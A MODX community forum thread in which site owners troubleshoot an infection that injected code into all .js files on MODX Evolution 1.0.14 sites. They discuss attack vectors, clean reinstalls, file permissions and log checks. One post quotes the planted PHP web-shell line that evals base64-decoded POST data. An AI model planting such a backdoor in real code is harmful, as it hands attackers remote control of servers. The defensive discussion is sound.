Some of my modx 1.0.14 are hacked

Oh, this was a evo thread. I didnt want to hijack it. Anyway, it belongs together somehow.

Hello,

I started this threat....

First: Great that so many people give rep sons and feedback!

But....

Everybody is talking about another old hack. This hack, everybody is talking about, is installed by old files from 10.0.x When you update to 10.0.14 it's possible the installed hack files are not gone ans still can used by the hacker. The hacker installed random .php files with an encrypted code and somethimes starts it with a code <?php eval(base64_decode($_POST['<random_string_here>']));?> When he starts the code, the server starts to spam mail. In no time youre server is on a blacklist...

I am talking about something else.....

Some of my sites where offline because of an Hacker installed Malware. Google noticed this an immediately they blocked the site with an warning message and no happy clients....

The hacker infected all of my .js files with the code you find in the attachment

My question is, how could this happen and how can i prevent this...
[ed. note: yoman last edited this post 9 years, 7 months ago.]

Sorry Yoman, all answers in this thread don't show the attacking vector so it is almost impossible to tell if it is an old hack or a new one.

If it is an old one, you should update MODX with the alternate Method. With 5. you have a clean system. Every file that is copied in 6., 7. and 8. has to be checked for a possible infection or should be installed new from a secure source (i.e. MODX Repository).

If it is a new one, you could only cure the symptoms (restore the .js files and make them only writable by ftp - if the changes are done by a php shell and your webserver config uses different rights for php and ftp) until the attacking vector is detected.

same here (like Spheerys described above) - and I was pretty sure that we've cleand everything when we updated to 1.0.14.
Modified files were from last week.

In this case we also replaced manager and assets folder completely and
found, that there is a newer library available for

/assets/snippetes/phpthumb/phpthumb.class.php
(updated to Version 1.7.13-201406261000)

That might be a new vulnerability, but I'm not absolutely sure.

I just got asked to look at a crippled Modx site. I'm seeing the same hack with every .js file on the site affected with the script as mentioned by Yoman.

It also gets mentioned here along with a possible clean-up script:

http://blog.lux-medien.com/2014/09/how-to-fix-actermoto-and-its-edited-javascript-files/

This phpthumb version is already in the bugfix branch. But I don't think that it has that security issues (see changelog).

Do you have an access log around the time the files were modified?

Quote from: Jako at Sep 17, 2014, 08:39 AM

This phpthumb version is already in the bugfix branch. But I don't think that it has that security issues (see changelog).

Do you have an access log around the time the files were modified?

unfortunately not

Could it be possible than the malware is hiding himself on the database ?
For example, if we delete blog.php (or similar), like a "magic", the malicious code is recreating them from the database ?

Quote from: Spheerys at Sep 17, 2014, 09:11 AM

Could it be possible than the malware is hiding himself on the database ?
For example, if we delete blog.php (or similar), like a "magic", the malicious code is recreating them from the database ?

Possible? yes. But not very likely. You can test that with a dump of your database and a text search against the content of your blog.php


edit: typos

What I know so far if it helps...

Time stamps on the server don't give any clue as they are falsified to make it look like they are older.

Seems like .php files are 'planted' around 60 days before injection into .js files happens.

Can't find anything in the database that indicates it's compromised.